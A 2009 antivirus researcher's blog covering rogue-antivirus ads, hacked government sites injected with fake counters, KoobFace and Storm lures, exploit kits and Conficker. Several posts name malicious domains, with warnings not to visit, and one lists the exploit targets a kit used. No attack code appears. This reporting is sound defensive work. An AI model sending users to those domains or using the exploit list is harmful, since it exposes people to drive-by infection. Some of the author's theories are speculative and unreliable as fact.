Tuesday, September 15, 2009

Ok, now that was interesting!

Over the weekend, several people noticed attacks originating from a malicious ad placed at nytimes.com. Viewers were redirected to what we call a fake, or rogue antispy page, where the webpage _pretends_ to scan your computer, and then tries to convince you to install some nifty antivirus program to clean it up-oh-but-you-have-to-register-first-put-your-credit-card-here-mr-victim. Nothing new there... it's the most common thing we see _every_ day.

We've been watching this particular style of rogue attack since about March, and just happened to have them under the microscope over the weekend, and here's the interesting thing... normally, we see 10-15,000 such detections each day, but from about last Thursday thru Sunday, it spiked to 160-170,000 per day. It dropped off today to about 20,000.

The attacks seemed to come from two main types of lures, with the first being advertisments, including the fake one on nytimes, and lots of Flash banner ads, and the second being searches for "newsie" events like Kanye and Taylor, and Patrick Swayze, and Serena Williams.

It's ever so impressive how quickly they not only react, but also point the news search results at their hijacked lure machines. In other words, not only are they quick to react to something news worthy, but they are somehow able to get their hijacked machines right up to the top of the google and bing searches. These guys are flat-out clever.

In summary, not only was there a huge spike in activity by this particular group (or groups), but they quickly were able to manipulate the search engines.

It goes without saying that LinkScanner is able to detect and block these attacks, but it's a dangerous Web folks.

Keep safe,


Saturday, July 11, 2009

I think I know what the ddos is about

If you've watched any news broadcasts since the 4th of July, you'll be aware that that certain US and South Korean government and commercial websites have been under Distributed Denial Of Service (ddos) attack. Early on, someone pondered for a minute or two about who might be a common enemy to both the US and SK, and the obvious answer was .... gasp... North Korea!!! And if NK is the perp, then clearly this is ... cyberwar!!! Holy Moley Batman!!!! Quick ... run to the bunkers!

It's obviously a great headline, but most actual security folk took the view that it's just a ddos, for goodness sake. If we can't get to Whitehouse.gov for a few days, the world is not going to end. The tourists will still take their photos from the street, and the rest of us will just get another cup of coffee while we wait for it to end. Ddos's are really easy to do, and impossible to prevent up front. It's just that they're not profitable, so no one bothers in this day of "Show me the money for my malcode". And it was silly to blame North Korea, because the whole point of a ddos from a remote controlled botnet is that no one really knows who's driving it.

Now, having had a look at the disparate list of victim websites, my initial thought was that it was a disgruntled businessman targeting the Federal Trade Commission, and shooting at everyone else to conceal their real target, but then we realized that the malcode was programmed to self-destruct, starting July 10th, by erasing the first megabyte of the victim's hard drive!

At least this would effectively clean up these computers.

After we got over laughing about botmasters destroying their own botnet, and making jokes like "Don't these guys understand how retaliation works?", etc, the light slowly dawned on us that maybe they did understand exactly what they were doing.

It's not cyber-war ... it's someone who's worried about the growing plethora of botnets on the Internet, and who's trying to make people care enough to do something about it! A vigilante!

Think about it.

Why bother nuking 60k computers after doing all the work of assembling them? Nuking them only helps the Good Guys, because the victims are forced to re-build, and therefore clean, their computers.

Why bother with a ddos of a bunch of disparate government and commercial websites? Nobody was really impacted ... border routers were reprogrammed to deflect the ddos off any important sites... the only thing it really did was cause a bunch of lawmakers to point the finger at North Korea.

And the only other thing it really did was make lawmakers think "If North Korea could do this with a mere 60k machines, what could Al Qaeda do with a big botnet of 300k machines?"

Big botnets are really common, by the way.

The only reasonable explanation for the whole thing is that it was someone who is worried about the botnet problem, and who wanted to make lawmakers think about it, and do sometihng about it.

A high--tech vigilante.

By the way, the vigilante has a point. Botnets are a real probem, and we need to mitigate them a bit. Most ISPs could do something, except that their give-a-darn bone is broken.

Incidentally, the erase-one-mb thing reminds several of us of the CIH virus. The underground scuttlebut about the CIH author was that he was hired by Taiwanese military intelligence. It's an easy mind-wander to wonder if there's a connection there. Surely not. :-)

Keep safe folks.

Thursday, June 4, 2009

Unfortunate brand squatting

Hi folks,

A common practise among enterprising webmeisters is what's known as brand-squatting. That's where you find a domain whose owner has neglected, or not bothered, to renew it, and it's up for grabs. If you get something modestly popular, then you get the beneift of whatever residual traffic they've generated as a starting point. Makes sense for most domains.

This time, however, someone re-registered and re-vitalized one of the most notorious brands in malcode history .... coolwebsearch ! :-) :-) :-)

Not only that, but while it was a search-enginey kind of page, it was also hosting an exploit!!! Whether that was deliberate or accidental is not clear, but it doesn't matter much as it's down now.

coolwebsearch.us was registered on about the 18th of April 2009, and our first detection was 24th April. Our last was yesterday, but as this graph shows, activity has been tapering off anyway.

Here's a graph of the detection events our users told us about.

As you can see, we had about 11,000 hits spread over 40 days, across 106 countries.

It's a dangerous internet folks, but at least it's sometimes funny.

Keep safe,


Please follow me on Twitter

Monday, May 11, 2009

Here's a whoopsie to start the week.

*** don't go to any of these websites... they seem safe today, but you can't be certain, and it's better to avoid them ***

It's just a simple (and common) script injection, but the victim is kind of interesting. Seems like none other than the City of London website has poor security. :-)

As usual, the page itself renders just fine, and looks like this ...

but if you have a look at the source, you see something like this ...

If you look closely, you see references to URLs like 4log-in.ru, and in fact there are eight different ones...


(again, don't go to these places unless you know what you're doing, because you might get nailed)

What this means is that the City of London website has been nailed, not once, but _eight_ times.

Fortunately, the site is seemingly not infective, so the injections have only partly worked, but then again, it might depend on what you click on the page, and there might well be other hacked pages that we've not discovered yet.

What needs to happen is that the injections need to be removed, and the City of London webmeisters need to find the form that is allowing the injections, and fix it.

It's a dangerous Internet, folks. Keep safe.



Saturday, April 4, 2009

The gift that keeps on giving

So... years ago, I wrote a program called WormRadar. It was designed to detect and measure the malware of the day, worms. More recently, the web became the main attack vector, and we started building programs to detect and measure that activity (which is where LinkScanner came from), and WormRadar gradually fell into disuse. Really recently (as opposed to more recently, and yes, my old English teacher wants to rap my knuckles for that), we cranked up a WormRadar node again, just to see what new things were circulating, and the number one thing we're detecting is .... Slammer!!!!!!

Now, many readers will already see the funny side of that, but many will also not, so for the "nots" ... SqlSlammer was a worm that appeared in January 2003, and really hit the Internet hard. That was pretty amazing at the time, because it exploited a vulnerabilty that had been patched as MS02-039... _six_ months earlier. In other words, although a patch had been released for six months, so many people had not patched, that the worm was able to be a major spreader six months later.

Then, in 2004, Microsoft released XP Service Pack 2, in which the firewall was on by default for first time, and this was really an Extinction Level Event for most worms, because even little old Windows firewall is enough to stop all worms. There have not been any worms since then that can force their way thru the firewall from outside. Conficker, for example, relies on gettin ginside the firewall by some other method... USB drive... social engineering ... whatever... and then runs rampant inside a network, but it can't _force_ its way in.

This then, is the amusing and amazing thing about Slammer... it's still alive and well six _years_ after its first appearance, which is six _years and six months_ after the patch was released!

In other words, there are computers which are just never patched!!!!

There is a name for this type of user .... Victims!

Keep safe folks! (Oh, and keep patched! ;-))


Tuesday, March 31, 2009

The imminent demise of the Internet ...

is being greatly exaggerated, in case you haven't figured it out by yourself.

What's happening is that people are worried because the Conficker worm is due to do "something" on Apr 1st, and no one knows exactly what. Human nature being what it is, some folks are fixating on the worst possible outcome. It'd be pretty bad if you got hit by a meteor too, but no one is building meteor shelters.

There are two main issues to consider here. The first is that Conficker is a pretty well-thought out attack, and it's pretty unlikely that they want to do anything but make money for their efforts. It's not in their, or anyone's interests to try to kill the Internet. They can't make money if they do that. They don't want to chop down the apple tree... they just want to shake it and pick up the apples that fall off.

The second is that this is a government/ corporate/ education problem... not a consumer. The two main vectors for spreading are a vulnerability in a service called RPC, which was patched in October 2008, and poorly protected network shares. The only people that have networks and who also don't patch are government, corporates and education users. Fortunately, they're also the folk that have staff with expertise that they can call on to fight back. The worm probably grabbed millions of users right out of the box in December 2008, but any gov/ corp/ edu user who is still infected after five months, deserves it. On the other hand, JoeThe Plumber almost certainly allows automatic patching each month, and probably doesn't have much of a network, and presents a much smaller target.

Yes, some of Joe's friends will have been nailed by now, by infected USB keys or something, but it's not going to be a massive number of users. The conficker botherders will simply have achieved their goal of building a fairly bullet-proof botherd, and will now "farm" that botnet, while they prepare their next attack. (We will see things like this again, so now would be a good time to upgrade to AVG identity protection ... it'll provide a good safety net for the next attack)

By the way, I think this is a fairly predictable consequence of playing whackamole with botherds. All you do is cull the weak ones from the herd, and encourage the smarter ones to build a stronger botnet.

All in all, I think the date of April 1st is entirely (if accidentally) appropriate.

Keep safe, folks.


Saturday, March 28, 2009

KoobFace, Facebook and Classmates... oh my.

Hi folks,

So, the March pitch from KoobFace seems to be bigger in scope...well, that's if you can derive stats from a sample-base of one, because I've personally received three pitches this time... One for FaceBook, and two for Classmates.com... but the basic pitch is the same.

It comes as an email along these lines ... : "Girls in beautiful black underwear dancing in the pub, showing off perfect bodies. Unbelievable Final!".

If you go to the webpage in the email, it looks pretty much like the site is Facebook or Classmates, because the fake site draws a bunch of content directly from the real site, like this ...

and, of course, the aim is to get you to download a fake Adobe update, which is really the worm.

Of course, if you look at the url in the browser bar, it is obviously not really FaceBook, but that's not the point. They don't expect to fool everybody .... they just want to fool enough bodies.

And, of course, it goes without saying that LinkScanner detects and blocks the fakes just fine.

Oh, and I am kidding about deriving stats from a sample-size of one. :-)

Keep safe folks,


Monday, March 16, 2009

One website cleaned ... many more to go

Hi folks,

Just a quick note to share that the hacked page at phoenix.spelthorne.gov.uk has been cleaned, and no longer displays "Fatal Error ownz you" and is no longer redirecting to sites in Turkey.

We have, however, found lots of other .gov.uk websites with hacked and (sometimes) infective pages, which we'll blog about shortly.



To be notified of updates to this blog, please follow me on Twitter

Thursday, March 12, 2009

Oh goody! City of Streator has a Yahoo counter!

The page looks quite normal, except that LinkScanner knows better and has told us that it contains a fake Yahoo! counter, and if you look at the source, sure enough you see this block of code ...

As readers of this blog will know, one of the more commonly-encountered web tricks is a Yahoo-counter-that-is-not-a-counter. Instead of counting visitors, it reaches out to an exploit site and ... counts victims.

This gang's specialty is to hack into an innocent website, and turn it into a unwitting lure... all the website's visitors are probed by the villains, and if they're vulnerable... wham! the visitor is a victim of a drive-by download.

Here's a sample from today's hack list. (*** AGAIN.... DON"T GO TO THE PAGE ... IT MIGHT BE STILL INFECTIVE ***)

This page, hxxp://www.ci.streator.il.us/cms/index.php?page=fire-department-faq-s, looks like this ...

If you look closely at the code you see not one, but _two_ yahoo counters! How exciting! This means they've been whacked not once, but twice. :-)

And sure, enough, if we look at the critical files list, we see the start of an infection cycle...

I find that outing a site on this blog is actually the best way to get it cleaned up. It's much more effective than me trying to explain to confused support staff, so c'mon City of Streator guys.... please clean your site, and fix the hole that allowed the Bad Guys in in the first place. You're probably running a vulnerable php tool or version.

Readers, please remember that City of Streator is an innocent victim too... they didn't mean for this to happen, but they do need to fix it.

Look both ways when crossing the web, folks.... it's dangerous out there.


Ps to be notified of updates to this blog, please follow me on Twitter

Monday, March 9, 2009

There's a bit of bad luck!

*** WARNING - This website is probably still hacked and infective, so please don't go there unless you really know what you're doing***

A couple of days ago, LinkScanner started detecting (and blocking) a page of a UK gov website, so we thought we'd take a look. This is the screen we were presented with ...

The "Fatal Error ownz you" is a fair clue that something is not quite right here. ;-)

While reading that, you are quickly and automatically redirected to this website ...

I'm reasonably confident that a Brit government website shouldn't be transferring you to (what I think is ) a Turkish one, so this is a fair second clue that something is wrong.

Once we establish that a site is hacked, we like to see how long it has been hacked, because mostly it's quite a quick thing ... most sites get hacked and cleaned up in under a couple of days... The best way to find out is to look at the search engine cached pages, so we had a look at the google cache, and to our surprise, we saw this page.... (again, don't even go to the cached pages, unless you know what you're doing, because if the page was infective when the search bots indexed it, it'll still be infective in the cache) ....

On January 24th, when the google bots crawled by, it was hacked again, by a different crew! That's what's known in the biz as a Bit Of Bad Luck (tm) !

So, just to be sure that they are not serially and constantly hacked, we consulted two more caches... The msn Live cache snapshot was taken on March 4th, and shows it clean...

and the ask.com cache snapshot was taken on January 7th, and it was clean then too.

The webmasters are obviously cleaning things up as quickly as they realize they have a problem, but seemingly have yet to plug the hole that the Bad Guys are using to get in. It just shows how tricky it is to keep your websites clean, and it shows how pointless it is to blacklist websites via a central database... it's always too slow to realize something is hacked, and too slow to realize it's cleaned up.

Stay safe folks,


To be notified of blog updates, please follow me on Twitter

Friday, March 6, 2009


Hi folks,

I've just realized that I didn't make it clear that this post is actually about KoobFace.



Wednesday, March 4, 2009

UsAid site hacked and infective

Hi folks,

The usaid.gov site for Azerbaijan is hacked and infective. _DO NOT GO TO THEIR SITE_. We made a vid to show what happens, because that's much safer than visiting, and it is viewable here...

Screen shots are a little bit blurry this time ... sorry about that... we've changed our screen resolution for captures and it didn't quite work out, but you can still get the idea.



Monday, March 2, 2009

Watch out for fake FaceBook emails

Today, one of our old friends, Mark Coker got three different emails purporting to be about Facebook. He twittered about it here and asked me what it was about.

He actually got three emails, all in short order, with this subject (remember, future attempts will have different subjects) ...

Review - My family invite you out for lunch, don't hesitate!

And if you click the embedded link, you're taken to a fairly convincing looking facebook page...

Notwithstanding the funny looking url that I've circled in red, the rest of the page looks convincing. If you are alert enough to look at the url, then you know you're not at a real FB page, but as I've often said, they don't want to catch everyone.. .they don't want to cut down the apple tree... they just want to shake it and pick up the apples that fall off.

If you click anywhere on the image, you get the "pitch" screen, that looks like this...

and then you get a convincing looking adobe download dialog. Given the number of recent Adobe updates, this will catch a bunch of folk, and they will indeed run the installer. This approach, by the way, works no matter how well you are patched, and probably even works if you are running full-blown UAC in Vista....

If you run it, of course, you no longer own your machine. It belongs to them, because it installs a rootkit....

This one is worse than most, because once it runs, it's subtle... it doesn't pop up messages asking you to install some antispy ... it's just _got_ you.

Remember, as the economy worsens around the world, the Bad Guys are more motivated than ever to get into your pc.

Keep safe folks,


Wednesday, February 25, 2009

It's _not_ a Yahoo counter!

One of the most common complaints we get is when a webmeister or user thinks we're unjustly accusing a website of being evil, and, without sounding immodest about it, we're usually right. The way LinkScanner works is that it makes its evaluations in real time ... it looks at the code as it comes off the webpage, and decides if things are dangerous or not. That's as opposed to those systems that rely on a central database, which is usually too slow to realize that something is dirty, and then too slow to realize it's been cleaned up.

A typical example is the fake Yahoo counter that looks like this ...

That's the source of a typically hacked page. You see the bit about "Yahoo counter starts" ? Guess what... it's _lying_! It actually decrypts to an iframe link to an exploit site, but you wouldn't believe the number of conversations I've had that go like this...

Ring, ring... me, "Hello, could I speak to your webmeister please?"
Shuffle, shuffle, switching thru ... webmeister, "Hello?"
me, "Hi, I'm sorry to have to tell you this, but I'm a security researcher, and I have to tell you that your website has been hacked."
webmeister, "Sorry... what ... who is this?"

and then we have many chats about who I am, and how I know, and eventually it gets to the point where they say "Show me", so I show them the code on their page, and they say "But it's a Yahoo counter!"
and I say "Did you put it in?", and they say, "Well, no, but one of the other guys must have"


Sometimes they believe me, but mostly they don't.

Here's the bottom line folks. I have yet to see a genuine Yahoo counter. They may exist, but they sure don't look like that, so if you're a webmeister with code like that in your pages, please delete it. Unless you put it there, it's fake.

Keep safe


Btw, to be notified of blog updates, plus little extra bits that don't make it to the blog, please follow me on twitter

Sunday, February 22, 2009

Off-topic (but I think it's a neat story)

Hi folks, this is completely off-topic, but I've been chewing on this for a few days, and feel I should share it...

A few days ago, I took three of my little girls to ballet, and in the middle of the class, the tornado sirens went off. The teachers got all the kids into the safest place in the building which was a hallway, and got them to sit down... all by the book.

Then the neat part happened...

One end of the hall was sort of open, and faced the windows .... obviously the most dangerous thing if a tornado did hit. Without anyone saying anything, the moms who were waiting for the kids sat between the kids and the windows, and the two dads, (me and another guy) interposed ourselves between the moms and the windows, thus taking the most dangerous spot. No one said anything, or talked about it ... it just all happened naturally.

The parents stayed calm, and the kids stayed calm, and the tornados went south of us, so they went back to ballet, and the parents went back to chatting aimlessly.

About an hour later, I thought about what had happened, and realized that something nice had occured. A bunch of strangers had naturally come together, without anyone saying anything, with the adults protecting the kids, and the men protecting the women.

In these days of terrible economic uncertainty, I found it heart warming to find that the natural inclination of a group of strangers was to protect the weaker ones.

We can, and will pull thru this, folks,



Thursday, February 19, 2009

I didn't say that, I _promise_

Ok, I'll admit it ... I google-alert my name. It's not as bad as it sounds, because I google alert lots of things. It's surprising to see how many people are named Roger Thompson, and it's even mildly amusing to see some of their professions, but that's a story for another day. Today, however, I got this alert...

"Even in spite of this it was a relatively benign episode as worms bearing of walking, Grey Goo is cost note, as it may be only the best ancient of this brand of malware for the future, warn Roger Thompson, CTO of anti-exploit software ..."

Now, I do like the occasional glass of shiraz, but I'm fairly confident that, even after a whole bottle of shiraz, I never said that. Heck, I can't even parse it.

It was in a blog whose identity shall remain private to protect the innocent (which may be all of us in this case), and a quick bit of searching found a second blog that opens with this amazing statement...

"A exotic resistant decisive against protecting computer user and business antagonistic zero-day attack aware to that occurrence exploit belt users' frozen drive launch a interview variation of its opening goods on Monday.", in an interview also attributed to me.

Although it was posted today, it was under a heading of "Antispyware pros launch SocketShield beta", which gives a bit of a clue, because that happened in early 2006, but I'm pretty sure I never said that either.

In fact, both blogs were full of incomprehensible and un-parsable english just like that. It looks like someone is picking up old articles, and translating them to non-English, and then back again... twice or more.

But the question is ... why bother? And my answer is ... I have no clue! What's the point? The blogs don't appear to be malicious as far as I and my software can determine, but who knows what might happen in the future?

As funny as the entries are, I think the best idea is simply regard them as potentially dangerous, and stay away. In other words, if you are googling for _anything_ and the summary that comes up on the search page doesn't make sense.... treat it like a crazy looking stray dog that might bite, and go to a different site.

Stay safe folks!


PS Please follow me on twitter

Tuesday, February 10, 2009

Storm is dead ... long live storm

Today I looked at a Valentine's Day eCard scam, and it was like unexpectedly bumping into an old friend...

I got this URL, yourgreatlove.com (**** DON"T GO THERE!!!!! IT MIGHT BE STILL LIVE AND DANGEROUS**** ) from the the malwarebytes forum (malwarebytes.org/forums/index.php?showtopic=11109) , and given that it was valentine's day malware, I thought I'd take a closer look, and I saw this screen...

I thought "That's Storm!... Haven't seen that for ages". Now, it might well have been around and I just haven't been paying attention, and I'm pretty sure it's what most people call the Waldec botnet, but it was fun to think "Oh, I know what you are!"

They've updated their crypto and their exploit set, but they still try to trick you into downloading something if the exploits don't get you first, and here's the current exploit list that they throw, hoping something will stick ...

Outlook Application
Vis Studio
MS Dbg Clr
Vis Stuidio DTE
Vis Studio
Microsoft Update Web Control
Outlook Data Object
Business Object Factory
NCT Audio File
Yahoo webcam/Messenger - June 2007
Real Player - March 2008
Creative Labs - May 2008
CA List Ctrl
Yahoo webcam - June 2007
Kingsoft update ocx - Apr 2008
MySpace uploader ocx - Feb 2008
WebEx mtg manager - Aug 2008

Of course, if they nail you, you become part of the botnet, as well as giving up your identity and bank account.

Anyway, it was a deja vu moment. These guys show a pretty fair understanding of current events, and US holidays, so the next thing we'll probably see is an Easter version, unless something newsworthy happens... disaster photos of Australian bushfires maybe?

Keep safe folks,


My wife and son have managed to get a song in the final 15 for the annual NSAI Country Music Television awards. This is out of several thousand entries. They have two chances to win. The first is the judged portion, which is conducted by CMT.com themselves, but the second is a public vote. It's a big opportunity for them.

Their song is "I found everything" by Kate and Ben Thompson, and you can vote for them (as often as you'd like) at http://nsai.cmt.com . I've resisted the temptation to enlist a botnet :-) but would like to help them win.

Please consider voting for them, and please ask five of your friends to.


Thanks in advance


Thursday, February 5, 2009

Guess what should be blocked next? :-)

*** Warning! DON"T go to any of these sites***

One of the longer-lived attack sites is thedeadpit. This first graphic shows the attack profile, showing a peak of about 1500 hits per day. (You can click any of the images for a larger view)

And then, after a while we started seeing the same stuff come from internetcountercheck. The attack profile shows a recent peak of about 4000 hits in one day. This is kind of interesting, and probably reflects a marketing push on their part.

It turns out that there are five domains on their domain name server, and look ... today the third one is starting too :-) ...

and here are the rest of the domains on the domain server...

So, as you can see, it's a case of three down, two to go. If anyone likes to block URLs, these would be a couple of good ones to add.



Monday, February 2, 2009

Firefox /El Fiesta mystery solved... well, sort of

One the most common attack kits (that we see and block every day) is El Fiesta. It is frequently updated, and according to reports, pretty cheap.... generally a fair formula for success in any part of the software biz. It has a neat statistics page that keeps nice stats like which countries it has seen, and how many successes (or loads) it has managed in each country.

It also tracks the browsers it has seen, and tracks its successes against each browser. At the bottom of the statistics page, it shows how well it has done with each exploit.

The first interesting point here is that it shows 67 loads against FireFox 3.5, which is impressive, and even more interesting is that the summary shows two FF exploits ... a FF NS Local, and a FF Behavior.

This lead us to wonder what they might be, and in particular, just what was the FF Behavior trick?

At first, all we could get it to do was to throw fairly common PDF exploits at FireFox, which all failed, but then, after certain components were updated just right, we suddenly got this screen that wants to update the page....

Now, if you click ok for the update, and then run the update, you get this old friend ...

Gosh, you've got spyware.... whoda thunk it? Now, I'm not saying it's a great trick or anything, but as the stats page shows, it works. Remember, these guys don't want to cut down the apple tree... they just want to shake it, and pick up the apples that fall off.

We'll keep trying to figure out exactly how they're doing it, just for grins, but there are two other mysteries that we stumbled across while trying to solve this one, so we'll see what happens.



Thursday, January 29, 2009

A view of the recent google video attack

Hi folks,

Dancho Danchev blogged here about an inventive new way Bad Guys were luring people to innocent videos but then redirecting them to an attack site, which would then try to trick them into installing something bad. Dancho says they'd managed to hijack 400,000 search terms, so it's quite a big attack. We detect and block the way they attempt the trickery, so we were blocking it preemptively, but it's interesting to look at our graph of the attack...

Our first detection was on January 19th, and it jumped to between 200 and 250 a day up until January 27th, when it took a sharp drop and just about disappeared on the 28th. So here's the interesting bit ... a whois lookup of the attack domain shows that it was registered on January 19th, which means we started detecting it the same day they brought it on line... and then Dancho published his blog on January 27th, and the attacks diminished dramatically on the same day (probably because he also told the security team at google on the same day, and they started cleaning out the search pages)

Now, you might be tempted to think that a couple of hundred attacks a day for not much more than a week was not much of a payoff for hijacking 400,000 search terms, but it's important to understand that this is just measuring the attacks from a single domain. They probably had lots more than that. These guys are pretty smart, without a doubt.

I don't know about you, but I think it's pretty cool when you can see data like this, and even cooler when you can explain why it's happened.




Tuesday, January 27, 2009

Obama worm? ... nah, surely not

I don't often get to work at the coal face much anymore (which is a shame, because I'm a coal-face kind of guy), but today I had that privilege. One of our resellers, Walling Data, called me and asked if I knew of any malcode that displayed a picture of President Obama. While I could see the funny side of that, no matter what your political persuasion might be, I had to admit that I had not, but here's a screen shot to show you what these folks were seeing....

I'd be happy to think it was just someone's prank, except for these facts...
(1) The victim is a school, with about 100 pcs
(2) It appeared on all pcs at about the same time
(3) The pcs have fielsharing enabled
(4) It's not clear if all pcs are patched.

We're still investigating it, but Occam would suggest that it is what it seems ... a worm. Probably not a conficker variant, because as far as we can tell, the source code is not available for Conficker, but probably something exploiting ms08-067.

Anyway, we'll keep investigating, and will let you know what we find.



PS: Note to school admins: Given that Conficker source is probably not available, and if no one else ends up reporting this, there's some chance one of your students wrote it. Find your smartest, geekiest, dweebiest kid, and look hard at him. Remember, the geek shall inherit the earth.

PPS: Despite all the press, and the large number of victims that Conficker has recently gained, it's worth noting that this is probably a corporate and edu problem rather than a consumer problem. The only people this should really have caught are those that (1) haven't patched a two month old vulnerability and (2) allow filesharing. These are corporates and edus. Consumers, for the most part, allow automatic patching each month, and any consumer naive enough to allow filesharing got nailed a long time ago. This assertion is supported by the fact that, within our client base (mostly consumer and smb), we've had very little detection of it. It's also worth noting that if the perps really did nail 9 million victims, they defeated their own purpose anyway, because they dd0sed themselves instantly. Have you got any idea how long it would take to enumerate 9 million pcs over the Internet? They're still on the first pass, for sure.

Saturday, January 24, 2009

Something interesting tonight (and, boy, we have a great community)

Hi folks,

One of our friends, a security guy at the IRS, noticed a new FastFlux botnet today serving up exploits, and Nick FitzGerald a well-known anti malware guy investigated a bit further and found that the exploits were being fired based on which browser the visitor is using.

If you're using Internet Explorer, for example, it shoots a bunch of common IE exploits. Nothing too new here, so if you're patched, you're fine, but one interesting bit is that it looks to me like it's been lifted from a decrypted Neosploit, and tweaked a bit.

If you're using Firefox or Opera, it shoots a specific exploit for FF or Opera, and if you're using Chrome or Safari, it fires some generic pdf exploits at you.

The encryption technique is new, and bit cute in the way that it is hooked into the html, presumably to try to avoid decryption emulators.

Oh, and if it succeeds, it installs a fairly new rootkit, which AVG detects as an Agent variant. Oh, and from Russia, too.

So the first interesting thing is that it shows that the Bad Guys are constantly thinking and innovating and probing, but the second, and more important thing is that it highlights how well the anti-malware community cooperates, mostly unnoticed and unappreciated, behind the scenes.

Shout-outs to our friend at the IRS and Nick.



Monday, January 19, 2009

Write your passwords down

Hi folks,

For most of the last 20 years or so that I've been paying attention to computer security, the mantra has been "Don't write your passwords down .... someone might steal your postit note... make a password you can remember."

Now, this is a Good Idea, _except_ that it encourages most people to have just one password... Or maybe two, if you have a really strong memory. And, unlike twenty years ago, where you maybe only had an email password, and a network login password at the office, there are now a zillion places to log into. As well as your email and the office, there's all the web 2.0 (or as I like to put it, the web 2.uh-oh) stuff ... your bank, youtube, myspace, facebook, amazon, ebay and twitter to mention but a few. Guess what ... if they're all using the same password, and _one_ of them gets hacked or phished, you lose you password to everywhere. If that includes your bank or paypal password, that's about the key to the kingdom, and you might not even know until real money starts disappearing.

Instead of using just one or two password, have many, and _write them down_.... either in your wallet or in a database. If you lose your wallet, at least you'll know to reset your passwords, as well cancel your credit cards.

Remember, there's now a whole industry comprised of people whose job it is to compromise your security. They go hungry if they don't, so they are highly motivated to be successful. Be careful on the Internet.

Cheers folks,